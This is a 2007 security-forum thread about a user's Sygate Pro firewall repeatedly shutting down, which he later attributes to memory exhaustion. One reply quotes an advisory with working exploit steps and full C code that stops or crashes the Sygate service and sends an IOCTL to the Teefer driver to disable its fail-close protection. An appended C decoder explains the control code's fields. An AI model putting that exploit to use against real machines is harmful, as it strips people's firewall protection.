Full Version: Firewall shut down multiple times by hacker
Gladiator Security Forum > Security Software & Hardware > Firewalls & Routers
xyz
I use Sygate Pro 5.5 (build 2710) on one of the computers that I use to access the Internet, along with the XP Home OS. A few weeks ago I lost my Internet connection. While troubleshooting, my mouse passed over the Sygate icon in the system tray, and the icon then disappeared -- indicating that Sygate had shut down. Then I remembered that I was using the Sygate option that blocks all Internet traffic when Sygate is not active.

I opened Sygate back up and experienced no further problems with my connection. The next night, the same thing happened again, except it occurred at least six times. As soon as I opened Sygate back up and re-established my Internet connection, it would get shut down again. Finally, I waited about an hour and tried again. This time Sygate remained open and has not shut down since then.

When I experienced these shutdown problems, I had not done anything out of the ordinary. No new software installs, etc.

However, I had about 75 Web sites open during those two days, and I hadn't downloaded any new Microsoft security updates for at least a month. Plus, I had let NAV expire, because I only go to safe sites, and don't do anything risky online. Also, I use Firefox with the "NoScript" extension. As for email, I open it in plain text only.

I installed AVG anti-spyware and BoClean after the second night, but it hasn't detected anything. I also installed an AVG anti-rootkit program. My theory is that the lack of MS security updates at the time allowed a hacker to gain access through a possibly compromised web site that was open at the time.

My question is what kind of access did the hacker need in order to do what he did? Meaning, would it have required full access to my computer, in the sense that he would also have been able to install a backdoor and keylogger? And he's just patiently waiting until I access my bank accounts so he can steal my passwords and clean out my accounts?

In other words, would he have been able to shut down Sygate without being able to do anything else? And once the possible compromised web site was shut down, and the MS security updates were installed, he was then locked out?

My concern is that since he was able to shut Sygate down over and over, he had full access to my computer, and now 'owns' it. He's probably getting copies of all my email, etc., and is able to get AVG and BoClean to ignore his malware.

But then again, why would he be so determined to shut down Sygate if he had full access to my PC? Could it be because he wanted to use my computer as a server, or in a DoS attack, and he needs the firewall to be shut down in order to do that? Also, if he has full access, he could simply uncheck that option in Sygate that shuts off my connection, unless he just doesn't know about it.

Consequently, I'm thinking the only practical solution is to reformat -- which I definitely don't want to do if I don't have to. Please let me know your opinions on this.

BTW, I've been using Sygate Pro for more than five years, and this is the first time that something like this has ever happened.
Nebon
  • Hasn't Sygate been taken over by Symantec and integrated into Norton Internet Security? Does this not mean your firewall is highly outdated? (I have been looking for the version in question and the last one seems to have been March 2005.)
  • Are you up to date with all microsoft patches?
  • If you are worried about your computer being compromised I would move all sensitive data to another computer or delete it at once.
  • Are you definitely sure it's a hacker shutting down your firewall? If I were a hacker I would either use a program to kill your firewall and remove it or to disable all your antiviruses. I do not think he would manually shut down your firewall as it would be easier to remove it.
  • You are correct in thinking that if your system is already compromised and he has found a way in then why would he need to shut down your firewall. That is a question I would also like to know. The only thing I could think of is that the hacker would want to run a piece of software to connect to the internet and maybe Sygate notifies the user when a program wants to connect to the net. Unfortunately I have never used Sygate before so I would not be able to tell you on that one.
For such an old firewall people can find vulnerabilities everywhere, which makes your computer compromised. Here is one from a previous build that I found within 2 minutes of searching:

QUOTE
Sygate Personal Firewall Pro (SPFP) is implemented as a user-space service
(smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys).
The driver creates a device named \\device\Teefer. The user-space service
(smc.exe, tfman.dll) communicates with the kernel-space driver through
this device using specific Device I/O control codes.
The driver does not validate the source of the control codes, allowing
malicious programs to send control codes to the driver and disable its
fail-close protection. SPFP attempts to prevent this by allowing only one
program in user-space to open a handle to its driver. Theoretically, as
long as smc.exe is running, no other program can access the driver. This
simple protective measure can be circumvented in two ways:

1. If the program is running with administrative permissions it can simply
stop smc.exe:
net stop smcservice

2. A non-administrative program can exploit the ListView control in SPFP's
GUI in order to crash the service. An example of the line of code needed
to do this is given below:
SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);
The fail-safe mechanism then will disable all incoming and outgoing
traffic by using the following code:
#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* With smc.exe gone, nobody holds the one permitted handle to the
       driver, so any program can open \\.\Teefer and talk to it. */
    HANDLE hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL, NULL);
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("Open failed\n");
    }
    else
    {
        printf("Device opened.\n");

        /* Eight-byte request buffer: two DWORDs, both zero. */
        char buffer[8];
        DWORD *ptr = (DWORD *)buffer;
        DWORD *ptr2 = (DWORD *)(buffer + 4);
        DWORD ret;

        *ptr = 0;
        *ptr2 = 0;

        /* 0x212094 is the control code the advisory uses to disable the
           driver's fail-close protection. */
        if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
                           &ret, 0))
            printf("Sent.\n");

        CloseHandle(hDevice);
    }
    return 0;
}

If you have any questions feel free to ask.
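An added example, not from the thread or from the quoted advisory: the control code 0x212094 above is an opaque number until it is split into the fields Windows packs into every IOCTL with its CTL_CODE macro. The decoder below is plain portable C (no windows.h) so it builds anywhere; the field layout and the constant names are from winioctl.h, and the helper names (ioctl_decode, ioctl_encode, ioctl_needs_handle_rights) are this example's own.

```c
/*
 * Decode a Windows device I/O control code into the fields the CTL_CODE
 * macro packs into it.  Layout, from winioctl.h:
 *   bits 31..16  device type        (FILE_DEVICE_*)
 *   bits 15..14  required access    (FILE_ANY_ACCESS = 0, FILE_READ_ACCESS = 1,
 *                                    FILE_WRITE_ACCESS = 2, both = 3)
 *   bits 13..2   function number    (driver-defined)
 *   bits  1..0   buffering method   (METHOD_BUFFERED = 0, METHOD_IN_DIRECT = 1,
 *                                    METHOD_OUT_DIRECT = 2, METHOD_NEITHER = 3)
 */
#include <stdint.h>
#include <stdio.h>

struct ioctl_fields {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
};

/* Split a control code into its four fields. */
struct ioctl_fields ioctl_decode(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      =  code        & 0x3u;
    return f;
}

/* Inverse of ioctl_decode: the same packing CTL_CODE does. */
uint32_t ioctl_encode(uint32_t device_type, uint32_t function,
                      uint32_t method, uint32_t access)
{
    return (device_type << 16) | ((access & 3u) << 14) |
           ((function & 0xFFFu) << 2) | (method & 3u);
}

/* Non-zero when the I/O manager itself refuses the request on a handle that
 * lacks the matching read/write right.  Zero (FILE_ANY_ACCESS) means any
 * handle that could be opened at all may send this code, so only the device
 * object's DACL and the driver's own checks stand between a caller and the
 * driver. */
int ioctl_needs_handle_rights(uint32_t code)
{
    return ioctl_decode(code).access != 0;
}

const char *ioctl_method_name(uint32_t method)
{
    static const char *names[] = {
        "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"
    };
    return names[method & 3u];
}

const char *ioctl_access_name(uint32_t access)
{
    static const char *names[] = {
        "FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
        "FILE_READ_ACCESS | FILE_WRITE_ACCESS"
    };
    return names[access & 3u];
}

int main(void)
{
    /* The control code the advisory's program sends to \\.\Teefer. */
    uint32_t code = 0x212094u;
    struct ioctl_fields f = ioctl_decode(code);

    printf("0x%06X -> device type 0x%02X, function 0x%03X, %s, %s\n",
           (unsigned)code, (unsigned)f.device_type, (unsigned)f.function,
           ioctl_method_name(f.method), ioctl_access_name(f.access));
    /* 0x21 is FILE_DEVICE_TRANSPORT in winioctl.h, which fits an NDIS
     * intermediate driver. */
    printf("round trip: 0x%06X\n",
           (unsigned)ioctl_encode(f.device_type, f.function, f.method, f.access));
    return 0;
}
```

For 0x212094 the decoder gives device type 0x21 (FILE_DEVICE_TRANSPORT), function 0x825, METHOD_BUFFERED and FILE_ANY_ACCESS. That last field is the security-relevant one: with FILE_ANY_ACCESS the I/O manager performs no access check of its own, so once smc.exe is no longer holding the only allowed handle, the "one handle at a time" rule the advisory describes is the only thing the driver relies on, and it is gone.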
xyz
QUOTE (Nebon @ Aug 7 2007, 05:35 AM) *

Hi Nebon,

1) True, Sygate was sold to Symantec, but the outdated version has a reputation for being better than many newer firewalls, in that the basic functions work very well.

2) I updated the MS patches immediately after the Sygate shutdowns on the second day.

3) RE: "Are you definitely sure its a hacker shutting down your firewall". No, not after some more troubleshooting I did yesterday. I believe now there's a good possibility my OS was shutting it down due to lack of resources/ram from having too many programs and web sites open. Or Sygate may even have been shutting itself down because it didn't have the memory necessary to do its job effectively. The most likely scenario is that it may simply have been crashing when it ran out of memory.

4) Sygate does have a good warning system asking permission for programs to access the Internet.

5) Thanks for the warning about the vulnerabilities. I thought Sygate was too solid to be vulnerable to new exploits, but apparently not. After reading that example you included, I'll probably be switching to Outlook, as I think it's the closest to Sygate in terms of features.

Thanks for the info.
Nebon
Okay, I am glad to help. Good job, you now have that under control.
Euthanize Hippies
QUOTE (Nebon @ Aug 7 2007, 10:35 AM) *
Sygate .. is highly outdated?


+1
sray
I too have had a similar firewall failure to what xyz described. It too occurred when memory was heavily taxed.

I cannot speak to the question of whether significant security vulnerabilities have been found in the Sygate firewall since it was maintained, except to say that a security expert (the kind that presents papers at the Black Hat Conference) recently recommended it to me.

I can speak to a large vulnerability in most personal firewalls. Personal firewalls start after the OS is running and are shut down before the OS ceases to run. This allows two time windows during which traffic can completely bypass the firewall. I have asked many personal firewall vendors about protection in these windows. Only two that I have found have claimed to protect the computer during these times. One was Sygate. Using Ethereal, I have verified that the only traffic that Sygate passes is the needed housekeeping traffic associated with obtaining a connection to the local LAN. When I monitored the other firewall that made such a claim, I learned that bypassing a firewall is a real threat. It allowed ten seconds of traffic at DSL speeds to bypass the firewall.

At this point I can only speculate where that traffic was going. It appears to be from call-home programs that are loaded before the firewall. Whether these are from malware or a Microsoft OS "feature," I do not know. I do know that if it is malware it is so sophisticated that multiple malware scanners cannot find it. With that in mind I present the following:

1) Do not be quick to get rid of your "old" Sygate firewall, it may still be the best personal firewall available.

2) Please let me know if there are any other personal firewalls that really do prevent this kind of firewall bypassing attack.

3) Please let me know of any vulnerabilities in the Sygate firewall, particularly ones that are more serious than the bypass attack described above.